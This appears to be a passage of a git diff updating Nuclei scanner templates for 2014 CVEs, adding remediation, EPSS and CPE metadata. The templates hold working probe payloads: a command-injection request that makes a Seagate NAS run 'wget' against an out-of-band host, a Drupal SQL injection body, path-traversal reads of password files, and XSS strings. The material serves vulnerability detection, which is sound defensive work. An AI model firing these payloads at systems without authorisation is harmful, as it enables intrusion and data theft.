appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. reference: - https://www.kb.cert.org/vuls/id/774788 - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l - http://www.kb.cert.org/vuls/id/774788 - http://www.belkin.com/us/support-article?articleNum=109400 - remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. + - https://www.exploit-db.com/exploits/38488/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N cvss-score: 7.8 cve-id: CVE-2014-2962 cwe-id: CWE-22 - tags: cve,cve2014,lfi,router,firmware,traversal + epss-score: 0.95825 + epss-percentile: 0.99249 + cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: belkin + product: n150_f9k1009_firmware + tags: cve,cve2014,lfi,router,firmware,traversal http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/23 +# digest: 4b0a00483046022100eab9c081c0783156e268de0eb273b540f8a6edd27ccfde4faf0278dd35581ffd022100b106e2ae94a76d3e28c16f49559861f5c9326f2a05d033e4afd99b77416d3ba0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index c48d236345..28ebba569f 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -3,22 +3,30 @@ id: CVE-2014-3120 info: name: ElasticSearch v1.1.1/1.2 RCE author: pikpikcu - severity: critical + severity: medium description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. + remediation: | + Upgrade to a patched version of ElasticSearch reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - https://www.elastic.co/blog/logstash-1-4-3-released - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://bouk.co/blog/elasticsearch-rce/ + - https://www.elastic.co/community/security/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2014-3120 - tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic + cwe-id: CWE-284 + epss-score: 0.55248 + epss-percentile: 0.97268 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: elasticsearch + product: elasticsearch + tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic http: - raw: @@ -49,17 +57,17 @@ http: matchers-condition: and matchers: - type: word + part: header words: - "application/json" - part: header - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 4a0a004730450220460a28dbb7028091ed3f956d0b9d60a19495cc74af9dd70c7515d77e15f715a9022100ee1215c947afbcf36d1bc35be5678feea06f7bf7a0d258e0ce7888319f3e9530:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 8627fdfb2e..46a8e32e32 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. + remediation: | + Apply the latest firmware update provided by Seagate to patch the command injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 - https://www.exploit-db.com/exploits/33159 @@ -14,9 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2014-3206 cwe-id: CWE-20 - tags: cve,cve2014,seagate,rce,edb + epss-score: 0.54379 + epss-percentile: 0.97247 + cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: seagate + product: blackarmor_nas_220_firmware + tags: cve,cve2014,seagate,rce,edb http: - raw: @@ -24,7 +31,6 @@ http: GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} @@ -37,4 +43,4 @@ http: words: - "http" -# Enhanced by mp on 2022/02/24 +# digest: 4a0a0047304502205db8876b5b301796875b9967aec6a5bd435b722ca46d8e19d654c0b371460a060221008a926315d45755ef8ea20de9cf35f59f3c7dd5e282909dbd9fd2db551fab8dcc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 0a54df0161..4863c751dc 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -5,6 +5,7 @@ info: author: princechaddha severity: high description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys. + remediation: Upgrade to Drupal core 7.32 or later. reference: - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql - https://nvd.nist.gov/vuln/detail/CVE-2014-3704 @@ -13,17 +14,20 @@ info: - https://www.exploit-db.com/exploits/34992 - https://www.exploit-db.com/exploits/34993 - https://www.exploit-db.com/exploits/35150 - remediation: Upgrade to Drupal core 7.32 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2014-3704 cwe-id: CWE-89 + epss-score: 0.97533 + epss-percentile: 0.99989 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: drupal + product: drupal shodan-query: http.component:"drupal" tags: edb,cve,cve2014,drupal,sqli - variables: num: "999999999" @@ -31,19 +35,20 @@ http: - method: POST path: - "{{BaseURL}}/?q=node&destination=node" + body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a' matchers-condition: and matchers: - type: word + part: body words: - "PDOException" - '{{md5({{num}})}}' condition: and - part: body - type: status status: - 500 -# Enhanced by mp on 2022/02/24 +# digest: 490a0046304402204584b9fc2acdc9b6107ae30d11d5d05dfe2ba22fe902babdec7452e8a94a8671022047d76acbececa608ab0722ef4725491993eb102cd8fa9922833997b4357e1ef0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index c08fc34a0c..7e0450d347 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -5,19 +5,27 @@ info: author: geeknik severity: high description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. + remediation: | + Upgrade to a patched version of the st module or use an alternative module that is not vulnerable to directory traversal. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-3744 - https://github.com/advisories/GHSA-69rr-wvh9-6c4q - https://snyk.io/vuln/npm:st:20140206 - https://nodesecurity.io/advisories/st_directory_traversal + - http://www.openwall.com/lists/oss-security/2014/05/13/1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2014-3744 cwe-id: CWE-22 - tags: cve,cve2014,lfi,nodejs,st + epss-score: 0.00672 + epss-percentile: 0.77558 + cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nodejs + product: node.js + tags: cve,cve2014,lfi,nodejs,st http: - method: GET @@ -26,11 +34,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/02/24 + - type: status + status: + - 200 + +# digest: 4a0a0047304502204e6ee2c8cd0db7322b0d9f482a1ba1043f49cfe6e7d0b4b0d795e0f09eda6192022100bedd9dfc61d24a2053b09b18c9db5ab22f0bce11f87a92c0561e37c098e3c806:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 1c82fab373..8874e38738 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -5,19 +5,27 @@ info: author: princechaddha severity: medium description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services. + remediation: | + Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability reference: - https://www.oracle.com/security-alerts/cpujul2014.html - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html + - http://seclists.org/fulldisclosure/2014/Dec/23 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo - tags: cve,cve2014,weblogic,oracle,ssrf,oast + epss-score: 0.96955 + epss-percentile: 0.99633 + cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: fusion_middleware + tags: seclists,cve,cve2014,weblogic,oracle,ssrf,oast http: - method: GET @@ -26,13 +34,13 @@ http: matchers-condition: and matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + - type: status status: - 200 - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/02/24 +# digest: 4b0a00483046022100fa5c59dbebb636c7cfb51a872f5180167d16a95255da67ff33f1f4f0adfa025b022100a7e4c8dc05d3b378d0a5604a7bd079129e4786fce7965c74b9c1854bea3060d8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index a3f2c28365..5ca7066fc1 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -5,16 +5,24 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. + remediation: | + Upgrade to a patched version of ActiveHelper LiveHelp Server or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4513 - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2014-4513 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00145 + epss-percentile: 0.50154 + cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: activehelper + product: activehelper_livehelp_live_chat + framework: wordpress google-query: inurl:"/wp-content/plugins/activehelper-livehelp" tags: cve,cve2014,wordpress,xss,wp-plugin @@ -26,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -39,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 490a0046304402203638ad44298ca1f701f1fe6c654a6b13dba9c6b3765ce3a5ee886c80910b7a5302201eda4f15cb318b2b378f380ab5f782e30464922e6a428a94fcbba6b1d46397d3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 36b6fef707..3f9216b291 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + remediation: | + Update to the latest version of the Import Legacy Media plugin (0.1 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 @@ -14,11 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4535 cwe-id: CWE-79 - cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth + epss-percentile: 0.48476 + cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: import_legacy_media_project + product: import_legacy_media + framework: wordpress + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: - method: GET @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header @@ -41,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 4b0a00483046022100cfaef727a880f9a3f8544d0f111fe269639430aec39ca0a86eb402a7fbb5b12d022100978347471f9f75dcbe088d3041854d425be6010a0a174ee253e2fc8b3fae6967:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index fd7e733332..ad1a16f883 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. + remediation: | + Upgrade Infusionsoft Gravity Forms Add-on to version 1.5.7 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 @@ -15,10 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4536 cwe-id: CWE-79 - cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:*:*:* epss-score: 0.00149 + epss-percentile: 0.50754 + cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: katz + product: infusionsoft_gravity_forms + framework: wordpress google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth @@ -30,9 +36,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - type: word part: header @@ -43,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 490a00463044022078f62c018ff0ce7a83c4dc1e17c0b9e727b7e9d2346b530aff1cdd05b03f20db02202b8a72a0e08bd242dd888530d42c0a4e3b54cda64d0bac5fb1294a8c140482ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 6789c78bb0..a5db51c275 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + remediation: | + Upgrade to a patched version of the Movies plugin (version 0.7 or above) that addresses the XSS vulnerability. reference: - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304 - https://nvd.nist.gov/vuln/detail/CVE-2014-4539 @@ -14,11 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4539 cwe-id: CWE-79 - cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth + epss-percentile: 0.48476 + cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: movies_project + product: movies + framework: wordpress + tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth http: - method: GET @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header @@ -41,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 4a0a00473045022100b8e7416bdf39bad8cfefb3a301e7c5995637a6261ee6becf49a69467ca84a650022047571baf95ce9fbe1f06647cfb47baf086aa6a3eb83f38af91c096b444e88b32:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index fafa4450c9..8bf8d39b35 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability. + remediation: | + Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability. reference: - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 @@ -14,11 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4544 cwe-id: CWE-79 - cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:*:*:* epss-score: 0.00118 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth + epss-percentile: 0.45512 + cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: podcast_channels_project + product: podcast_channels + framework: wordpress + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: - method: GET @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 490a004630440220409e1f576cc14c41553af93d5a6100302639bf4c9818d4e9016780d5970344b002203ef884f50e9862da0aa63106b8ab9da1d9b60b20ae7158bf75988a345d2d0c6c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index d6e28bbe34..10c62a1df9 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter. + remediation: | + Update to the latest version of the Shortcode Ninja plugin (1.4 or higher) to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 @@ -14,10 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4550 cwe-id: CWE-79 - cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:*:*:* epss-score: 0.00135 + epss-percentile: 0.48476 + cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: visualshortcodes + product: ninja + framework: wordpress google-query: inurl:"/wp-content/plugins/shortcode-ninja" tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth @@ -29,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header @@ -42,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 4a0a00473045022100f67e85a7b458adb96030e60f444bd7a30e413a55e24b3931e9941a5663c433e3022075a5a41822151dc09009a948348145ea2ff886786839c97f9f7de2673488913b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 832a77be8a..e45b8b22a5 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter. + remediation: | + Update to WooCommerce Swipe plugin version 2.7.2 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 @@ -14,11 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4558 cwe-id: CWE-79 - cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth + epss-percentile: 0.48476 + cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: cybercompany + product: swipehq-payment-gateway-woocommerce + framework: wordpress + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth http: - method: GET @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header @@ -41,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 4a0a004730450220558503140fabdb4643b404ff872b3f8c6b7ed78da0887d10d3ff5b39afeff24b0221009544d731989c3ed3c122dff11d9d16afb465ad5034b6546cb6b3a1b27385db98:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 40f6ff8be1..b26301fbf3 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. + remediation: | + Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability. reference: - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 @@ -14,11 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4561 cwe-id: CWE-79 - cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:*:*:*:*:*:*:*:* epss-score: 0.00098 - tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth + epss-percentile: 0.40462 + cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: ultimate-weather_project + product: ultimate-weather + framework: wordpress + tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth http: - method: GET @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - type: word part: header @@ -41,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 4a0a00473045022100c29aecfff55430faa2cb0d091823fe5a6397463f309b6e03b78e2e752d5c2f8f02202c6a84533bd85d1183d8cee7dcca3faacf77cab7fc926bf7c501b17591d3b189:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 6bc482a627..4f91166d6d 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -4,7 +4,10 @@ info: name: WP Planet <= 0.1 - Cross-Site Scripting author: daffainfo severity: medium - description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter. + description: | + A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter. + remediation: | + Update to the latest version of WP Planet plugin (0.1 or higher) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 @@ -14,27 +17,40 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4592 cwe-id: CWE-79 - cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:*:*:* epss-score: 0.00135 + epss-percentile: 0.48476 + cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 + vendor: czepol + product: wp-planet + framework: wordpress google-query: inurl:"/wp-content/plugins/wp-planet" tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - raw: + - | + GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - type: word + part: body_1 words: - - "" - part: body + - "WP Planet" - type: word - part: header + part: body_2 + words: + - "" + + - type: word + part: header_2 words: - text/html @@ -42,4 +58,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 490a0046304402206be750591de3013b009930bc0458a67c4a9b789996a989b963ef85f2b8ef958f022050f4e6875e1181bcf51aaeeb023291168b41691010e33d291eeccbbc2efbcdfc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 6e707218af..599ed516e9 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -3,19 +3,27 @@ id: CVE-2014-4940 info: name: WordPress Plugin Tera Charts - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. + remediation: | + Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-4940 + cwe-id: CWE-22 + epss-score: 0.03891 + epss-percentile: 0.90946 + cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: tera_charts_plugin_project + product: tera-charts + framework: wordpress google-query: inurl:"/wp-content/plugins/tera-charts" tags: cve,cve2014,wordpress,wp-plugin,lfi @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 4b0a00483046022100ccc8fc1aa7ecc83f8a7c0612d13d225f5a19ca63f109307328997b402b17e8d4022100e7239ded92f9c4a2432a71581989deba82fa49697f12f29d9ac5de646dccdb14:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index d75c059a6b..a7bd7ad498 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -3,21 +3,31 @@ id: CVE-2014-4942 info: name: WordPress EasyCart <2.0.6 - Information Disclosure author: DhiyaneshDk - severity: low + severity: medium description: | WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + remediation: | + Upgrade to WordPress EasyCart version 2.0.6 or later. reference: - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150 - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure - 